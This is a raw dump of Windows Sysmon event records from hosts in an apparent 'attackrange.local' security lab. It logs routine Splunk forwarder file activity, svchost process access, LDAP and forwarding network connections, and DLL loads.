19:18:19.504{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095145Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:19.228{761B69BB-7A7B-6080-985F-00000000BA01}57283196C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{761B69BB-8200-607D-A100-00000000BA01}4148C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095144Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:19.153{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=739C7D81CA25ACFC931C578063367487,SHA256=769D1221F7FCBA723C04AF189BE0ABEE2C11006500225EA5030D3D79A2CCAFE2,IMPHASH=00000000000000000000000000000000falsetrue 
11241100x80000000000000001606103Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:19.085{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606102Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:19.085{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A254E7E44721BA16694BF9A93120A2B,SHA256=B8F0E8179308015BF2E9A9DBCEC5856DB097B832E1C878C061464F9FCDEDCA00falsefalse - insufficient disk space 10341000x80000000000000001095143Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:19.083{761B69BB-8200-607D-A500-00000000BA01}43443804C:\Windows\system32\conhost.exe{761B69BB-7A7B-6080-985F-00000000BA01}5728C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095142Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
19:18:19.082{761B69BB-818C-607D-0C00-00000000BA01}8447060C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095141Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:19.081{761B69BB-818C-607D-0C00-00000000BA01}8447060C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095140Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
19:18:19.081{761B69BB-818C-607D-0C00-00000000BA01}8447060C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095139Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:19.081{761B69BB-818C-607D-0C00-00000000BA01}8447060C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095138Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:19.081{761B69BB-818A-607D-0500-00000000BA01}408532C:\Windows\system32\csrss.exe{761B69BB-7A7B-6080-985F-00000000BA01}5728C:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B3EBAF8B0065629B8D96F5EA6CE6245C,SHA256=4840B8A0CB28F3D889C06E7FA9088316372BD6EF1F4E6182E52BC29A3C73593Efalsefalse - insufficient disk space 23542300x80000000000000001095208Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:22.967{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=59775ECBC322A9ADDD818B7DAF67AB2A,SHA256=BAFDC6902D5BC02F74C5DC828A85701F837B6C96B0CEC840953D774C4EF5616C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001095207Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:22.509{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=919092A467298BDBA985FE694DCF0B41,SHA256=2F8AB510859E31DEA941BD486D129B6E24CAC52ADC05574E0DBACAE3BE22079D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001606114Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:20.703{21761711-8431-607D-C500-00000000BB01}3840C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-5.attackrange.local49731-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 11241100x80000000000000001606113Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:22.175{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 
23542300x80000000000000001606112Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:22.175{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9AF864EC5EFE2D1BA601B1771E5783C3,SHA256=79095C3C1E91AF57C8C85E555F9A2E139868A7A50510CC3486FD9BCEC3ADE0D2falsefalse - insufficient disk space 11241100x80000000000000001606111Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:22.175{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001606110Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:22.175{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5691726ECF6E19D2399493C1470CE1DE,SHA256=CB04D98D49C60A0C10FB57FE64E8493089F65F6D2A497F6B09C58281D06CF12Efalsefalse - insufficient disk space 11241100x80000000000000001606109Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:22.092{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606108Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:22.092{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B034882375937D1EC6DB218261E8583B,SHA256=058DCA941D4720241F2230C88606D97DADB7E6AA2C8A55804245C0D741999071falsefalse - insufficient disk space 10341000x80000000000000001095206Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:22.506{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095205Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:22.506{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095211Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:23.515{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=482012F23F1CF531E987144B8B2CDBDF,SHA256=BB0CA5984C2C7E28DA12FB81A8E8F224F0C92036A8EE3BD58324F403741E34A2,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001606116Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:23.095{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606115Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:23.095{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C46FFA979193259521323BFA10B606B,SHA256=7FCC5EFBB62B90E19C35AE8739859D8E210711D3868EEB4C19A3C7D9E44A86F5falsefalse - insufficient disk space 10341000x80000000000000001095210Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:23.507{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095209Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
19:18:23.507{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095214Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:24.538{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ADBE38EE9A1784318F486BFF0B01769B,SHA256=0E9C0B8AC3A5B67899E5119E380ED20524F6F0C19A78E5A67A41DF72D7745269,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001606118Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:24.097{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606117Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:24.097{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C72908268928EC588E45ADD520CFBFE1,SHA256=BEFC3E614FCF3B03920C510B3F1FE4F9C4D693DA098ED7BBF98A554D197B4C06falsefalse - insufficient disk space 
10341000x80000000000000001095213Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:24.508{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095212Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:24.508{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001095221Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:21.056{761B69BB-818A-607D-0B00-00000000BA01}632C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-982.attackrange.local1154-true0:0:0:0:0:0:0:1win-dc-982.attackrange.local389ldap 354300x80000000000000001095220Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:21.056{761B69BB-819C-607D-2400-00000000BA01}2752C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT 
AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-982.attackrange.local1154-true0:0:0:0:0:0:0:1win-dc-982.attackrange.local389ldap 354300x80000000000000001095219Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:20.663{761B69BB-8207-607D-CF00-00000000BA01}4116C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-982.attackrange.local1153-false10.0.1.12-8000- 23542300x80000000000000001095218Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:25.552{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD496C33F757225D205A29F008E36FC7,SHA256=8302AC2DA8947DD0661D6D8B221A9D241695EB44A1F77913C74DBB72DBBDB6E7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001606120Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:25.115{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606119Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:25.115{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8AC15B6370C483F590186D99F4C6764B,SHA256=96C73DCC35BD835A933D25AB924FBE3B6FC9CF006F9CA0866C9902769B8110FDfalsefalse - insufficient disk space 10341000x80000000000000001095217Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
19:18:25.508{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095216Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:25.508{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095215Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:25.073{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0519E80E5D610AEC3B9DFDF16259F621,SHA256=8E1B76D74EDE632C040E64FAC32E4D1BA41B008B6B18F67D22CBC4B88E1DB972,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001095224Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:26.556{761B69BB-820D-607D-D800-00000000BA01}1064NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EBD4747511DB84730D630F1ACD6D2FE3,SHA256=5D18D62FBBE6973A3841F78DAD7ADAF0D7B7A4CD286C0CF73193888CBC57DE42,IMPHASH=00000000000000000000000000000000falsetrue 534500x80000000000000001606178Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:26.588{21761711-7A82-6080-C260-00000000BB01}8136C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe 734700x80000000000000001606177Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:26.588{21761711-7A82-6080-C260-00000000BB01}8136C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 734700x80000000000000001606176Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:26.588{21761711-7A82-6080-C260-00000000BB01}8136C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146trueMicrosoft WindowsValid 734700x80000000000000001606175Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:26.588{21761711-7A82-6080-C260-00000000BB01}8136C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® 
